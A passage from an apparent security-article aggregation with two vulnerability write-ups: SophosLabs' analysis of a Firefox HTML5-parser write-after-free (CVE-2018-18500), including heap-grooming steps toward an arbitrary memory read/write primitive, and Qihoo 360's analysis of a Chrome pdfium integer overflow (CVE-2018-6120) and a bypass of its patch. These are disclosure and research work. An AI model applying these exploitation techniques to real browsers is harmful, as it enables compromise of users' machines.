    Sursa: https://www.activecyber.us/activelabs/solarwinds-local-privilege-escalation-cve-2019-9546

  8. CVE-2018-18500: write-after-free vulnerability in Firefox, Analysis and Exploitation

    exploits-explained.jpg?w=640

    Editor’s note: This article is a technical description of a bug discovered by a member of the Offensive Research team at SophosLabs, and how the researcher created a proof-of-concept “Arbitrary Read/Write Primitive” exploit for this bug. The vulnerability was deemed critical by Mozilla’s bug tracking team and was patched in Firefox 65.0. It’s written for an audience with background in security vulnerability research; no background in Firefox internals or web browsers in general is necessary.

    Overview

    This article is about CVE-2018-18500, a security vulnerability in Mozilla Firefox found and reported to the Mozilla Foundation by SophosLabs in November, 2018.

    This security vulnerability involves a software bug in Gecko (Firefox’s browser engine), in code responsible for parsing web pages. A malicious web page can be programmed in a way that exploits this bug to fully compromise a vulnerable Firefox instance visiting it.

    The engine component where the bug exists is the HTML5 Parser, specifically around the handling of “Custom Elements.”

    The root cause of the bug described here is a programming error in which a C++ object is being used without properly holding a reference to it, allowing for the object to be prematurely freed. These circumstances lead to a memory corruption condition known as “Write After Free,” where the program erroneously writes into memory that has been freed.

    Due to the numerous security mitigations applied to today’s operating systems and programs, developing a functional exploit for a memory corruption vulnerability in a web browser is no easy feat. It more often than not requires the utilization of multiple bugs and implementation of complex logic taking advantage of intricate program-specific techniques. This means that extensive use of JavaScript is virtually a requirement for this type of work, and such is the case in here as well.

    The article uses 64-bit Firefox 63.0.3 for Windows for binary-specific details, and will reference the Gecko source code and the HTML Standard.

    Background – Custom Elements

    “Custom Elements” is a relatively new addition to the HTML standard, as part of the “Web Components” API. Simply put, it provides a way to create new types of HTML elements. Its full specification can be found here.

    This is an example for a basic Custom Element definition of an element extension named extended-br that will behave the same as a regular br element except also print a line to log upon construction:
    html_1.png?w=640The above example uses the “customized built-in element” variant, which is instantiated by using the "is" attribute (line 17).

    Support for Custom Elements was introduced in the Firefox 63 release (October 23, 2018).

    The Bug

    The bug occurs when Firefox creates a custom element in the process of HTML tree construction. In this process the engine code may dispatch a JavaScript callback to invoke the matching custom element definition’s constructor function.

    The engine code surrounding the JavaScript dispatch point makes use of a C++ object without properly holding a reference to it.

    When the engine code resumes execution after returning from the JavaScript callback function, it performs a memory write into a member variable of this C++ object.
    However the called constructor function can be defined to cause the abortion of the document load, which means the abortion of the document’s active parser, internally causing the destruction and de-allocation of the active parser’s resources, including the aforementioned C++ object.

    When this happens, a “Write-After-Free” memory corruption will occur.

    Here’s the relevant part in the HTML5 Parser code for creating an HTML element:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    nsresult
    nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor* aBuilder,
                                  nsIContent** aScriptElement,
                                  bool* aInterrupted,
                                  bool* aStreamEnded)
    {
      switch (mOpCode) {
        ...
        case eTreeOpCreateHTMLElementNetwork:
        case eTreeOpCreateHTMLElementNotNetwork: {
          nsIContent** target = mOne.node;
          ...
          *target = CreateHTMLElement(name,
                                      attributes,
                                      mOpCode == eTreeOpCreateHTMLElementNetwork
                                        ? dom::FROM_PARSER_NETWORK
                                        : dom::FROM_PARSER_DOCUMENT_WRITE,
                                      nodeInfoManager,
                                      aBuilder,
                                      creator);
          return NS_OK;
        }
        ...
    }
     
    nsIContent*
    nsHtml5TreeOperation::CreateHTMLElement(
      nsAtom* aName,
      nsHtml5HtmlAttributes* aAttributes,
      mozilla::dom::FromParser aFromParser,
      nsNodeInfoManager* aNodeInfoManager,
      nsHtml5DocumentBuilder* aBuilder,
      mozilla::dom::HTMLContentCreatorFunction aCreator)
    {
      ...
      if (nsContentUtils::IsCustomElementsEnabled()) {
        ...
        if (isCustomElement && aFromParser != dom::FROM_PARSER_FRAGMENT) {
          ...
          definition = nsContentUtils::LookupCustomElementDefinition(
            document, nodeInfo->NameAtom(), nodeInfo->NamespaceID(), typeAtom);
     
          if (definition) {
            willExecuteScript = true;
          }
        }
      }
     
      if (willExecuteScript) { // This will cause custom element
                               // constructors to run
        ...
        nsCOMPtr<dom::Element> newElement;
        NS_NewHTMLElement(getter_AddRefs(newElement),
                          nodeInfo.forget(),
                          aFromParser,
                          isAtom,
                          definition);
        ...

    Inside NS_NewHTMLElement, if the element being created is a custom element, the function CustomElementRegistry::Upgrade will be called to invoke the custom element’s constructor, passing control to JavaScript.

    After the custom element constructor finishes running and CreateHTMLElement() returns execution to Perform(), line 13 completes its execution: the return value of CreateHTMLElement() is written into the memory address pointed to by target.

    Next, I’ll explain where target points, and where it is set, how to free that memory using JavaScript code, and what type of value is being written to freed memory.

    What’s “target?”

    We can see target being assigned in line 11: nsIContent** target = mOne.node;.
    This is where mOne.node comes from:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    nsIContentHandle*
    nsHtml5TreeBuilder::createElement(int32_t aNamespace,
                                      nsAtom* aName,
                                      nsHtml5HtmlAttributes* aAttributes,
                                      nsIContentHandle* aIntendedParent,
                                      nsHtml5ContentCreatorFunction aCreator)
    {
      ...
        nsIContent* elem;
        if (aNamespace == kNameSpaceID_XHTML) {
          elem = nsHtml5TreeOperation::CreateHTMLElement(
            name,
            aAttributes,
            mozilla::dom::FROM_PARSER_FRAGMENT,
            nodeInfoManager,
            mBuilder,
            aCreator.html);
        }
      ...
      nsIContentHandle* content = AllocateContentHandle();
      ...
      treeOp->Init(aNamespace,
                   aName,
                   aAttributes,
                   content,
                   aIntendedParent,
                   !!mSpeculativeLoadStage,
                   aCreator);
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    inline void Init(int32_t aNamespace,
                     nsAtom* aName,
                     nsHtml5HtmlAttributes* aAttributes,
                     nsIContentHandle* aTarget,
                     nsIContentHandle* aIntendedParent,
                     bool aFromNetwork,
                     nsHtml5ContentCreatorFunction aCreator)
    {
      ...
      mOne.node = static_cast<nsIContent**>(aTarget);
      ...
    }

    So the value of target comes from AllocateContentHandle():

    1
    2
    3
    4
    5
    6
    nsIContentHandle*
    nsHtml5TreeBuilder::AllocateContentHandle()
    {
      ...
      return &mHandles[mHandlesUsed++];
    }

    This is how mHandles is initialized in nsHtml5TreeBuilder‘s constructor initializer list:

    1
    2
    3
    4
    5
    nsHtml5TreeBuilder::nsHtml5TreeBuilder(nsAHtml5TreeOpSink* aOpSink,
                                           nsHtml5TreeOpStage* aStage)
      ...
      , mHandles(new nsIContent*[NS_HTML5_TREE_BUILDER_HANDLE_ARRAY_LENGTH])
      ...

    So an array with the capacity to hold NS_HTML5_TREE_BUILDER_HANDLE_ARRAY_LENGTH (512) pointers to nsIContent objects is first initialized when the HTML5 parser’s tree builder object is created, and every time AllocateContentHandle() is called it returns the next unused slot in the array, starting from index number 0.

    On 64-bit systems, the allocation size of mHandles is NS_HTML5_TREE_BUILDER_HANDLE_ARRAY_LENGTH * sizeof(nsIContent*) == 512 * 8 == 4096 (0x1000).

    How to get mHandles freed?

    mHandles is a member variable of class nsHtml5TreeBuilder. In the context of the buggy code flaw, nsHtml5TreeBuilder is instantiated by nsHtml5StreamParser, which in turn is instantiated by nsHtml5Parser.

    We used the following JavaScript code in the custom element constructor:

    1
    location.replace("about:blank");

    We tell the browser to navigate away from the current page and cause the following call tree in the engine:

    Location::SetURI()
    -> nsDocShell::LoadURI()
       -> nsDocShell::InternalLoad()
          -> nsDocShell::Stop()
             -> nsDocumentViewer::Stop()
                -> nsHTMLDocument::StopDocumentLoad()
                   -> nsHtml5Parser::Terminate()
                      -> nsHtml5StreamParser::Release()

    That last function call drops a reference to the active nsHtml5StreamParser object, but it is not yet orphaned: the remaining references are to be dropped by a couple of asynchronous tasks that will only get scheduled the next time Gecko’s event loop spins.

    This is normally not going to happen in the course of running a JavaScript function, since one of JavaScript’s properties is that it’s “Never blocking”, but in order to trigger the bug we must have these pending asynchronous tasks executed before the custom element constructor returns.

     

    The last link gives a hint on how to accomplish this: “Legacy exceptions exist like alert or synchronous XHR“. XHR (XMLHttpRequest) is an API that can be used to retrieve data from a web server.

    It’s possible to make use of synchronous XHR to cause the browser engine to spin the event loop until the XHR call completes; that is, when data has been received from the web server.
    So by using the following code in the custom element constructor…

    1
    2
    3
    4
    5
    location.replace("about:blank");
     
    var xhr = new XMLHttpRequest();
    xhr.open('GET', '/delay.txt', false);
    xhr.send(null);

    …and setting the contacted web server to artificially delay the response for /delay.txt requests by a few seconds to cause a long period of event loop spinning in the browser, we can guarantee that, by the time line 5 completes execution, the currently active nsHtml5StreamParser object will have become orphaned. Then the next time a garbage collection cycle occurs, the orphaned nsHtml5StreamParser object will be destructed and have its resources de-allocated (including mHandles).

    "about:blank" is used for the new location because it is an empty page that does not require network interaction for loading.

    The aim is to make sure that the amount of work (code logic) performed by the engine in the span between the destruction of the nsHtml5StreamParser object and the write-after-free corruption is as minimal as possible, because the steps we will be taking for exploiting the bug rely on successfully shaping certain structures in heap memory. Since heap allocators are non-deterministic in nature, any extra logic running in the engine at the same time increases the chance of side effects in the form of unexpected allocations that can sabotage the exploitation process.

    What value is being written to freed memory?

    The return value of nsHtml5TreeOperation::CreateHTMLElement is a pointer to a newly created C++ object representing an HTML element, e.g. HTMLTableElement or HTMLFormElement.

    Since triggering the bug requires the abortion of the currently running document parser, this new object does not get linked to any existing data structures and remains orphaned, and eventually gets released in a future garbage collection cycle.

    Controlling write-after-free offset

    To summarize so far, the bug can be exploited to effectively have the following pseudo-code take place:

    1
    2
    3
    4
    5
    nsIContent* mHandles[] = moz_xmalloc(0x1000);
    nsIContent** target = &mHandles[mHandlesUsed++];
    free(mHandles);
    ...
    *target = CreateHTMLElement(...);

    So while the value being written into freed memory here (return value of CreateHTMLElement()) is uncontrollable (always a memory allocation pointer) and its contents unreliable (orphaned object), we can adjust the offset in which the value is written relative to the base address of freed allocation, according to the value of mHandlesUsed. As we previously showed mHandlesUsed increases for every HTML element the parser encounters:

    1
    2
    3
    4
    5
    6
    7
    8
    <br>                          <-- mHandlesUsed = 0
    <br>                          <-- mHandlesUsed = 1
    <br>                          <-- mHandlesUsed = 2
    <br>                          <-- mHandlesUsed = 3
    <br>                          <-- mHandlesUsed = 4
    <br>                          <-- mHandlesUsed = 5
    <br>                          <-- mHandlesUsed = 6
    <span is=custom-span></span>  <-- mHandlesUsed = 7

    In the above example, given the allocation address of mHandles was 0x7f0ed4f0e000 and the custom span element triggered the bug in its constructor, the address of the newly created HTMLSpanElement object will be written into 0x7f0ed4f0e038 (0x7f0ed4f0e000 + (7 * sizeof(nsIContent*))).

    Surviving document destruction

    Since triggering the bug requires navigating away and aborting the load of the current document, we will not be able to execute JavaScript in that document anymore after the constructor function returns:
    JavaScript error: , line 0: NotSupportedError: Refusing to execute function from window whose document is no longer active.
    For crafting a functional exploit, it’s necessary to keep executing more JavaScript logic after the bug is triggered. For that purpose we can use a main web page that creates a child iframe element inside of which the HTML and JavaScript code for triggering the bug will reside.

    After the bug is triggered and the child iframe’s document has been changed to "about:blank" the main page remains intact and can execute the remaining JavaScript logic in its context.

    Here’s an example of an HTML page creating a child iframe:

    html_2.png?w=640

    Background – concepts and properties of Firefox’s heap

    To understand the exploitation process here it’s crucial to know how Firefox’s memory allocator works. Firefox uses a memory allocator called mozjemalloc, which is a fork of the jemalloc project. This section will briefly explain a few basic terms and properties of mozjemalloc, using as reference these 2 articles you should definitely read for properly understanding the subject: [PSJ] & [TSOF].

    Regions:
    Regions are the heap items returned on user allocations (e.g. malloc(3) calls).” [PSJ]

    Chunks:
    The term ‘chunk’ is used to describe big virtual memory regions that the memory allocator conceptually divides available memory into.” [PSJ]

    Runs:
    Runs are further memory denominations of the memory divided by jemalloc into chunks.” [PSJ]
    In essence, a chunk is broken into several runs.” [PSJ]
    Each run holds regions of a specific size.” [PSJ]

    Size classes:
    Allocations are broken into categories according to size class.
    Size classes in Firefox’s heap: 4, 8, 16, 32, 48, …, 480, 496, 512, 1024, 2048. [mozjemalloc.cpp]
    Allocation requests are rounded up to the nearest size class.

     

    Bins:
    Each bin has an associated size class and stores/manages regions of this size class.” [PSJ]
    A bin’s regions are managed and accessed through the bin’s runs.” [PSJ]
    Pseudo-code illustration:

    1
    2
    3
    4
    5
    6
    void *x = malloc(513);
    void *y = malloc(650);
    void *z = malloc(1000);
    // now: x, y, z were all allocated from the same bin,
    // of size class 1024, the smallest size class that is
    // larger than the requested size in all 3 calls
     

    LIFO free list:
    Another interesting feature of jemalloc is that it operates in a last-in-first-out (LIFO) manner (see [PSJ] for the free algorithm); a free followed by a garbage collection and a subsequent allocation request for the same size, most likely ends up in the freed region.” [TSOF]
    Pseudo-code illustration:

    1
    2
    3
    4
    void *x = moz_xmalloc(0x1000);
    free(x);
    void *y = moz_xmalloc(0x1000);
    // now: x == y
     

    Same size class allocations are contiguous:
    At a certain state that may be achieved by performing many allocations and exhausting the free list, sequential allocations of the same size class will be contiguous in memory – “Allocation requests (i.e. malloc() calls) are rounded up and assigned to a bin. […] If none is found, a new run is allocated and assigned to the specific bin. Therefore, this means that objects of different types but with similar sizes that are rounded up to the same bin are contiguous in the jemalloc heap.” [TSOF]

    Pseudo-code illustration:

    1
    2
    3
    4
    5
    6
    7
    8
    for (i = 0; i < 1000; i++) {
            x = moz_xmalloc(0x400);
    }
    // x[995] == 0x7fb8fd3a1c00
    // x[996] == 0x7fb8fd3a2000 (== x[995] + 0x400)
    // x[997] == 0x7fb8fd3a2400 (== x[996] + 0x400)
    // x[998] == 0x7fb8fd3a2800 (== x[997] + 0x400)
    // x[999] == 0x7fb8fd3a2c00 (== x[998] + 0x400)
     

    Run recycling:
    When all allocations inside a run are freed, the run gets de-allocated and is inserted into a list of available runs. A de-allocated run may get coalesced with adjacent de-allocated runs to create a bigger, single de-allocated run. When a new run is needed (for holding new memory allocations) it may be taken from the list of available runs. This allows a memory address that belonged to one run holding allocations of a specific size class to be “recycled” into being part of a different run, holding allocations of a different size class.
    Pseudo-code illustration:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    for (i = 0; i < 1000; i++) {
            x = moz_xmalloc(1024);
    }
    for (i = 0; i < 1000; i++) {
            free(x);
    }
    // after freeing all 1024 sized allocations, runs of 1024 size class
    // have been de-allocated and put into the list of available runs
    for (i = 0; i < 1000; i++) {
            y = moz_xmalloc(512);
            // runs necessary for holding new 512 allocations, if necessary,
            // will get taken from the list of available runs and get assigned
            // to 512 size class bins
    }
    // some elements in y now have the same addresses as elements in x

    General direction for exploitation

    Considering the basic primitive of memory corruption this bug allows for, the exploitation approach would be trying to plant an object in place of the freed mHandles allocation, so that overwriting it with a memory address pointer at a given offset will be helpful for advancing in our exploitation effort.

    A good candidate would be the “ArrayObjects inside ArrayObjects” technique [TSOF] where we would place an ArrayObject object in place of mHandles, and then overwrite its length header variable with a memory address (which is a very large numeric value) using the bug so that a malformed ArrayObject object is created and is accessible from JavaScript for reading and writing of memory much further than legitimately intended, since index access to that malformed array is validated against the length value that was corrupted.

    But after a bit of experimentation it seemed like it’s not working, and apparently the reason is a change in the code pushed on October 2017 that separates allocations made by the JavaScript engine from other allocations by forcing the usage of a different heap arena. Thus allocations from js_malloc() (JavaScript engine function) and moz_xmalloc() (regular function) will not end up on the same heap run without some effort. This renders the technique mostly obsolete, or at least the straightforward version of it.

    So another object type has to be found for this.

    XMLHttpRequestMainThread as memory corruption target

    We are going to talk about XMLHttpRequest again, this time from a different angle. XHR objects can be configured to receive the response in a couple of different ways, one of them is through an ArrayBuffer object:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    var oReq = new XMLHttpRequest();
    oReq.open("GET", "/myfile.png", true);
    oReq.responseType = "arraybuffer";
     
    oReq.onload = function (oEvent) {
      var arrayBuffer = oReq.response;
      if (arrayBuffer) {
        var byteArray = new Uint8Array(arrayBuffer);
        for (var i = 0; i < byteArray.byteLength; i++) {
          // do something with each byte in the array
        }
      }
    };
     
    oReq.send(null);

    This is the engine function that’s responsible for creating an ArrayBuffer object with the received response data, invoked upon accessing the XMLHttpRequest‘s object response property (line 6):

     
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    JSObject* ArrayBufferBuilder::getArrayBuffer(JSContext* aCx) {
      if (mMapPtr) {
        JSObject* obj = JS::NewMappedArrayBufferWithContents(aCx, mLength, mMapPtr);
        if (!obj) {
          JS::ReleaseMappedArrayBufferContents(mMapPtr, mLength);
        }
        mMapPtr = nullptr;
     
        // The memory-mapped contents will be released when the ArrayBuffer
        // becomes detached or is GC'd.
        return obj;
    }

    In the above code, if we modify mMapPtr before the function begins we will get an ArrayBuffer object pointing to whatever address we put in mMapPtr instead of the expected returned data. Accessing the returned ArrayBuffer object will allow us to read and write from the memory pointed to by mMapPtr.

     

    To prime an XHR object into this conveniently corruptible state, it needs to be put into a state where an actual request has been sent and is awaiting response. We can set the resource being requested by the XHR to be a Data URI, to avoid the delay and overhead of network activity:
    xhr.open("GET", "data:text/plain,xxxxxxxxxx", true);

    mMapPtr is contained inside sub-class ArrayBufferBuilder inside the XMLHttpRequestMainThread class, which is the actual implementation class of XMLHttpRequest objects internally. Its size is 0x298:

    0x298.png?w=640

    Allocations of size 0x298 go into a 0x400 size class bin, therefore an XMLHttpRequestMainThread object will always be placed in a memory address that belongs to one of these patterns: 0xXXXXXXXXX000, 0xXXXXXXXXX400, 0xXXXXXXXXX800, or 0xXXXXXXXXXc00. This synchronizes nicely with the pattern of mHandles allocations which is 0xXXXXXXXXX000.

    To corrupt an XHR’s mArrayBufferBuilder.mMapPtr value using the bug we would have to aim for an offset of 0x250 bytes into the freed mHandles allocation:

    xhr_arraybufferbuilder.png?w=640

    So XMLHttpRequestMainThread is a fitting target for exploitation of this memory corruption, but its size class is different than mHandle‘s, requiring us to rely on performing the “Run recycling” technique.

    To aid in performing the precise heap actions required for “grooming” the heap to behave this way, we are going to be using another object type:

    FormData for Heap Grooming

    Simply put, FormData is an object type that holds sets of key/value pairs supplied to it.

    1
    2
    3
    var formData = new FormData();
    formData.append("username", "Groucho");
    formData.append("accountnum", "123456");

    Internally it uses the data structure FormDataTuple to represent a key/value pair, and a member variable called mFormData to store the pairs it’s holding:
    nsTArray mFormData;

    mFormData is initially an empty array. Calls to the append() and delete() methods add or remove elements in it. The nsTArray class uses a dynamic memory allocation for storing its elements, expanding or shrinking its allocation size as necessary.

    This is how FormData chooses the size of allocation for this storage buffer:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    nsTArray_base<Alloc, Copy>::EnsureCapacity(size_type aCapacity,
                                               size_type aElemSize) {
        ...
        size_t reqSize = sizeof(Header) + aCapacity * aElemSize;
        ...
        // Round up to the next power of two.
        bytesToAlloc = mozilla::RoundUpPow2(reqSize);
        ...
        header = static_cast<Header*>(ActualAlloc::Realloc(mHdr, bytesToAlloc));

    Given that sizeof(Header) == sizeof(nsTArrayHeader) == 8 and aElemSize == sizeof(FormDataTuple) == 0x30, This is the formula for getting the buffer allocation size as a function of the number of elements in the array (aCapacity😞

    bytesToAlloc = RoundUpPow2(8 + aCapacity * 0x30)

    From this we can calculate that mFormData will perform a realloc() call for 0x400 bytes upon the 11th pair appended to it, a 0x800 bytes realloc() upon the 22nd pair, and a 0x1000 bytes realloc() upon the 43rd pair. The buffer’s address is stored in mFormData.mHdr.

    To cause the de-allocation of mFormData.mHdr we can use the delete() method. It takes as parameter a single key name to remove from the array, but different pairs may use the same key name. So if the same key name is reused for every appended pair, calling delete() on that key name will clear the entire array in one run. Once a nsTArray_base object is reduced to hold 0 elements, the memory in mHdr will be freed.

    To summarize we can use FormData objects to arbitrarily perform allocations and de-allocations of memory of particular sizes in the Firefox heap.

    Knowing this, these are the steps we can take for placing a 0x400 size class allocation in place of a 0x1000 size class allocation (Implementation of “Run recycling”😞

    1. Spray 0x1000 allocations
      • Create many FormData objects, and append 43 pairs to each of them. Now the heap contains many chunks full of mostly contiguous 0x1000 runs holding our mFormData.mHdr buffers.
    “Poke holes” in memory
    • Use delete() to de-allocate some mFormData.mHdr buffers, so that there are free 0x1000 sized spaces in between blocks of mFormData.mHdr allocations.
    Trigger mHandles‘s allocation
    • Append the child iframe, causing the creation of an HTML parser and with it an nsHtml5TreeBuilder object with an mHandles allocation. Due to “LIFO free list” mHandles should get the same address as one of the buffers de-allocated in the previous step.
    Free mHandles Free all 0x1000 allocations
    • Use delete() on all remaining FormData‘s.
    Spray 0x400 allocations
    • Create many XMLHttpRequest objects.

    Image illustrations:

    step123_green.png?w=640&h=334

    step456_green.png?w=640&h=561

    If done correctly, triggering the bug after executing these steps will corrupt one of the created XMLHttpRequest objects created in step 6 so that its mArrayBufferBuilder.mMapPtr variable now points to an HTML element object.
    We can go on to iterate through all the created XHR objects and check their response property. If any of them contains unexpected data ("xxxxxxxxxx" would be the expected response for the Data URI request previously used here) then it must have been successfully corrupted as a result of the bug, and we now have an ArrayBuffer object capable of reading and writing the memory of the newly created HTML element object.

    This alone would be enough for us to bypass ASLR by reading the object’s member variables, some of them pointing to variables in Firefox’s main DLL xul.dll. Also control of program execution is possible by modifying the object’s virtual table pointer. However as previously mentioned this HTML element object is left orphaned, cannot be referenced by JavaScript and is slated for de-allocation, so another approach has to be taken.

    If you look again at the ArrayBufferBuilder::getArrayBuffer function quoted above, you can see that even in a corrupted state, the created ArrayBuffer object is set to have the same length as it would have for the original response, since only mMapPtr is modified, with mLength being left intact.

    Since the response size is going to be the same size we choose the requested Data URI to be, we can set it arbitrarily and make sure the malformed ArrayBuffer‘s length is big enough to cover not only the HTML element it will point to, but to extend its reach of manipulation to a decent amount of memory following the HTML element.

    The specific type of HTML element object to be written into mMapPtr is determined by the base type of HTML element we choose to extend with our custom element definition. HTML element objects range in size between 0x80 and 0x6d8:

    html_elements_sizes.png?w=640

    Thus we can choose between different heap size classes to target for manipulation by the malformed ArrayBuffer. For example, choosing to extend the “br” HTML element will result in a pointer to an HTMLBRElement (size 0x80) object being written to mMapPtr.

    As stated in the definition of heap bins, the memory immediately following the HTML element will hold other allocations of the same size class.
    To target the placement of a specific object right after the HTML element we can take advantage of the “Same size class allocations are contiguous” heap property and:

    1. Find an HTML element of the same size class as the targeted object, and base the custom element definition on it.
    Exhaust the relevant bin’s free list by allocating many instances of the same HTML element type. This fits well with the objective corruption offset of 0x250 bytes because defining many elements prior to the custom one is a necessity for reaching this offset and it helps us accomplish the exhaustion apropos. Allocate the object targeted for placement as soon as possible after the allocation of the custom HTML element object. The custom element’s constructor is invoked right after that so the object should be created first thing inside the constructor function.

    The most straight-forward approach to take advantage of this capability would be to make use of what we already know about XMLHttpRequest objects and use it as the target object. Previously we could only corrupt mMapPtr with a non-controllable pointer, but now with full control over manipulation of the object we can arbitrarily set mMapPtr and mLength to be able to read and write any address in memory.

    However XMLHttpRequestMainThread objects belong in the 0x400 size class and no HTML element object falls under the same size class!

    So another object type has to be used. The FileReader object is somewhat similar to XMLHttpRequest, in that it reads data and can be made to return it as an ArrayBuffer.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    var arrayBuffer;
    var blob = new Blob(["data to read"]);
    var fileReader = new FileReader();
    fileReader.onload = function(event) {
        arrayBuffer = event.target.result;
        if (arrayBuffer) {
            var byteArray = new Uint8Array(arrayBuffer);
            for (var i = 0; i < byteArray.byteLength; i++) {
                    // do something with each byte in the array
            }
        }
    };
    fileReader.readAsArrayBuffer(blob);

    Similar to the case with XMLHttpRequest, FileReader uses the ArrayBuffer creation function JS::NewArrayBufferWithContents with its member variables mFileData and mDataLen as parameters:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    nsresult FileReader::OnLoadEnd(nsresult aStatus) {
      ...
      // ArrayBuffer needs a custom handling.
      if (mDataFormat == FILE_AS_ARRAYBUFFER) {
        OnLoadEndArrayBuffer();
        return NS_OK;
      }
      ...
    }
     
    void FileReader::OnLoadEndArrayBuffer() {
      ...
      mResultArrayBuffer = JS::NewArrayBufferWithContents(cx, mDataLen, mFileData);

    If we can corrupt the FileReader object in memory between the call to readAsArrayBuffer() and the scheduling of the onload event using the malformed ArrayBuffer we previously created, we can cause FileReader to create yet another malformed ArrayBuffer but this time pointing to arbitrary addresses.

    The FileReader object is suitable for exploitation here because of its size:

    sizeof_filereader-1.png?w=640

    which is compatible with the “img” element (HTMLImageElement), whose object size is 0x138.

    malformed_array_buffer_green.png?w=640&h Illustration of a malformed ArrayBuffer pointing to a custom element, but also able to reach some of the adjacent FileReader objects

    Creation and usage of objects in aborted document

    Another side of effect of the abortion of the child iframe document is that any XMLHttpRequest or FileReader object created from inside of it will get detached from their “owner” and will no longer be usable in the way we desire.

    Since we require the creation of new XMLHttpRequest and FileReader objects at a specific point in time while the custom element constructor is running inside the child iframe document, but also require their usage after the document load has been aborted, we can use the following method of “synchronously” passing execution to the main page by employing postMessage() and event loop spinning using XHR:

    sync.html:

    html_3.png?w=640

    sync2.html:

    html_4.png?w=640

    Will yield the output:
    point 1 (child iframe)
    point 2 (main page)
    point 3 (child iframe)

    This way we can enable JavaScript code running from the child iframe to signal and schedule the execution of a JavaScript function in the main page, and be guaranteed it finishes running before gaining control back.

    PoC

    The PoC builds on all written above to produce an ArrayBuffer that can be used to read and write memory from 0x4141414141414141. It does not work in every single attempt, but has been tested successfully on Windows and Linux.

    The HTML file is meant to be served by the provided HTTP server script delay_http_server.py for the necessary artificial delay to responses.

    $ python delay_http_server.py 8080 &
    $ firefox http://127.0.0.1:8080/customelements_poc.html

    You can find the proof-of-concept files on the SophosLabs GitHub repository.

    Fix

    The bug was fixed in Firefox 65.0 with this commit.

    Mozilla fixed the issue by declaring a RAII type variable to hold a reference to the HTML5 stream parser object for the duration of execution of the 2 functions that make calls to nsHtml5TreeOperation::Perform: nsHtml5TreeOpExecutor::RunFlushLoop and nsHtml5TreeOpExecutor::FlushDocumentWrite.

    1
    2
    3
    4
    5
    +  RefPtr<nsHtml5StreamParser> streamParserGrip;
    if (mParser) {
    +    streamParserGrip = GetParser()->GetStreamParser();
    +  }
    +  mozilla::Unused << streamParserGrip;  // Intentionally not used within function

     

    About the Author

    Offensive Security Researcher at SophosLabs

    More from Yaniv >

     

    Sursa: https://news.sophos.com/en-us/2019/04/18/protected-cve-2018-18500-heap-write-after-free-in-firefox-analysis-and-exploitation/

  9. Google Chrome pdfium shading drawing  integer overflow lead to RCE

    Vulnerability Credit

    Zhou Aiting(@zhouat1) of Qihoo 360 Vulcan Team

    1. Vulnerability Description

    CVE:CVE-2018-6120

    Affected versions:Chrome Version < 66.0.3359.170

    2. Vulnerability analysis

    2.1 Vulnerability type

    Run poc file, get the ASAN crash dump:

    a1.jpg

    Figure 1

    2.2 Vulnerability root cause

    1) The code corresponding to the crash point is shown in Figure 2:

    7B77F29606EAD5C63BF03E1A89B6505E.jpg

    Figure 2 crash point code

    Since the value of m_nOrigOutputs is outside the scope of the array request space, an out-of-bounds write will occur at line #55 of Figure 2.

    2) Array declaration and the size of the allocation:

    The source code corresponding to the ASAN crash dump stack:

    58C11C7A4D9B73A29424CE832942E635.jpg

    Figure 3 The source code around ASAN crash dump

    With the help of the ASAN crash dump, we can locate the following source code: The size of the array is determined by the return value of the following function.

    9BDC6E9D2D07763EFC906648D43B9BDB.jpg

    Figure 4 Calculation of the required space of the array

    In Figure 4, set breakpoint at code line #100, after running multiple times, we can see that the value of total overflows when parsing the poc file.

    3. Vulnerability exploit

    Since the variables (m_nOrigOutputs, m_Exponent) can be precisely controlled in the pdf file by controlling the corresponding fields, we can simplify the assignment action . Control m_Exponent = 0, then FXSYS_pow(input ,m_Exponent) will always be 1.

    a2.jpg

    Figure 5

    The contents of m_pEndValues array come from the pdf file and are fully controllable, so it’s very simple to exploit this vulnerability.

    D379D9D759F58F51E6D216FF01E1C9BA.jpg

    Figure 6 The contents of the overflow array are fully controllable

    4. Demo

    40982BF8AF25A184ECAAF25676E4FC3D.jpg

    Figure 7 hijacking instruction register

    5. Vulnerability Patch

    The Chrome team fixed the vulnerability quickly:

    CAF4CE0DBC9DC0FA21FAEF557DC57BE5.jpg

    Figure 8 Google Fixed the vulnerability

    0EA8A2FF9EC8A93ED20E6465BEAB28DF.jpg

    Figure 9 Fixing code _1

    Using FX_SAFE_UINT32 replace previous uint32_t, the representation in memory : the upper four bytes are the value of unsigned int, and the lower four bytes hold the data overflow identifier.

    a3.jpg

    Figure 10

    Since the operator is overloaded, the overflow is automatically checked when doing a numerical calculation of this type, ensuring that overflow and underflow do not occur. The specific check method is to use the compiler’s built-in overflow detection function __builtin_add_overflow. After the overflow occurs, the function where the result_array is located returns directly. (See Figure 10)

    D759A92B97D90451A222D9DBB28A5A81.jpg

    Figure 11 Fixing code _2

    6. Attack again

    Affected versions: Chrome Version < 67.0.3396.99

    After the official fix of CVE-2018-6120 was out, we noticed such data type:

    CFX_FixedBufGrow<float, 16>, its constructor is shown in Figure 12:

    9EB533FA6003C984A3B909C4D5FB7C3E.jpg

    Figure 12. Constructor for CFX_FixedBufGrow

    CFX_FixedBufGrow<float, 16> result_array(total_results) meaning :

    (1) When the required space is not greater than 16, the stack space of 16 float types is returned;

    (2) Otherwise use the parameter (total_results) to request a piece of memory on the heap.

    The problem is that the argument passed in here is unsigned int, while the formal parameter is int.

    CVE-2018-6120 out of bound write vulnerability can be triggered again :)

    For the latest stable version, the new vulnerability described in this section is no longer exploitable, so we decided to disclose the details here.

    7. Fixed by non-security update

